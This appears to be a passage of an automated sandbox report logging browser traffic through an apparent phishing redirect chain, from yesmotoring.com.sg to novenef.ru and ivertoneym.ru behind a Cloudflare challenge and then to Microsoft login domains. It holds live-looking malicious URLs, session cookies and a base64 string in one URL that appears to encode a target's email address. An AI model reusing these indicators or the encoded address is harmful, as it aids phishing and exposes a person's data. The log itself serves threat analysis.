    Source: global trafficHTTP traffic detected: GET /Lj9e/ HTTP/1.1Host: y7.novenef.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://yesmotoring.com.sg/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y7.novenef.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y7.novenef.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y7.novenef.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y7.novenef.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://y7.novenef.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2912ef9947ce2&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: y7.novenef.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y7.novenef.ru/Lj9e/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZXcU9ld2JBc0MxQWNsWlNTVTl3TlE9PSIsInZhbHVlIjoicWVkdEtsSmFCRjhhTGl4Tjc4ZnhqOVpOMFRZWEVjdWU3SFMzWFZnSEFmYTVFN1lndWRtSldPRVQxcFp4VXVNUFd3NXpQVjZkYU1IZ1J3UCtnbWtmR3JHVlB3SFNvc0Q5VnRIS2thdXZpR1Awd05WOUNFNmkzV210dmJmK0FlQ20iLCJtYWMiOiJlMGUwNGMyMzYxMWY5YjVmNDU0NzdlYWZhZjdiNDA5YTQ0NjhhZTkwZWZhN2VlOWJkMDQ4YjQ3NzAxZjA5OGJjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxKWE0xcWJ1Tm4vTWloVTFsRXFwUlE9PSIsInZhbHVlIjoiSnRIS2N6UlR1VS9OSmRsL0dKbXBaOFc3OWtVWXNraE9UOU9TMyt1UldUaElOTFBJT3gyWTh1M3R6TUVPb1FjNVZNNDdRemlQTUxjekp4YmwxajhHVm04Q2t1elczVU9ZMkc1WGhrdDN3cnJYN1VrUUsvWUFvRVNNN0pFbFBldjUiLCJtYWMiOiI4NzY5ZDM5Y2Y1ZTdkMWJmOGEyZWY3YWZlMGJiYzdlZWRmNGMzM2U0YmVhMDg3MjA5OWUwMjNkZDJiOTgzNGNlIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe2912ef9947ce2&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe2912ef9947ce2/1736238432173/8Vh9ItncyZEQ6Vp HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe2912ef9947ce2/1736238432173/8Vh9ItncyZEQ6Vp HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fe2912ef9947ce2/1736238432174/6ed637ccacc930e47539890c4d5436892bfe5524ad06ce89a486f26a8eed1694/fptNhJZvCBcxF8q HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ItjnOrQFuqAwfUMRPcpijOHMGRTPXRGRZFXLIWPJUHDRHTAXAFCEEPIPRAIGIVWFSPLFFYUPBMOFHWRLVOOE HTTP/1.1Host: urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://y7.novenef.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://y7.novenef.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ItjnOrQFuqAwfUMRPcpijOHMGRTPXRGRZFXLIWPJUHDRHTAXAFCEEPIPRAIGIVWFSPLFFYUPBMOFHWRLVOOE HTTP/1.1Host: urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20= HTTP/1.1Host: yesmotoring.com.sgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: yesmotoring.com.sgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: t1.a.editions-legislatives.fr
    Source: global trafficDNS traffic detected: DNS query: www.google.co.nz
    Source: global trafficDNS traffic detected: DNS query: yesmotoring.com.sg
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: y7.novenef.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: www.office.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3149sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mqsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 08:27:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVcS3nk4wHQQoiLOlRJDZIiyM6ZbYW3yldql5xz1jAJAXpBIeB8fOK1TlKEwiH37qS4XSK18Je3yX1Q3L3CjFy1OBdvJoip4RgWGiKqBxv8MlLDmopA0expdiU3Xzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1217&min_rtt=1097&rtt_var=497&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1460&delivery_rate=2596171&cwnd=252&unsent_bytes=0&cid=907cc43b00fbd777&ts=421&x=0"CF-Cache-Status: HITAge: 3142Server: cloudflareCF-RAY: 8fe2913559444414-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1621&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1888&delivery_rate=1729857&cwnd=172&unsent_bytes=0&cid=40b19c1499f48d1d&ts=3852&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 08:27:13 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: zzr0tF7hOE3mPwTE8Led5eBfEIm40AQVaT4=$na41bUpA+PxQ3AuBServer: cloudflareCF-RAY: 8fe2913e9a1e423f-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 08:27:15 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: PXR1QnOKFNEvJCG6Ltm9WFo5GYjBod3t9po=$fCGfCSyQg6WwgJ/FServer: cloudflareCF-RAY: 8fe29150a97e78d6-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 08:27:18 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 62ofX+a0BCpGWiiaqdFv5q2CbYy055CbR44=$oo56G6lDg7ySVHCXServer: cloudflareCF-RAY: 8fe29162de11c431-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 08:27:06 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: chromecache_88.1.dr, chromecache_96.1.drString found in binary or memory: https://login.microsoftonline.com
    Source: chromecache_88.1.dr, chromecache_96.1.drString found in binary or memory: https://login.windows-ppe.net
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
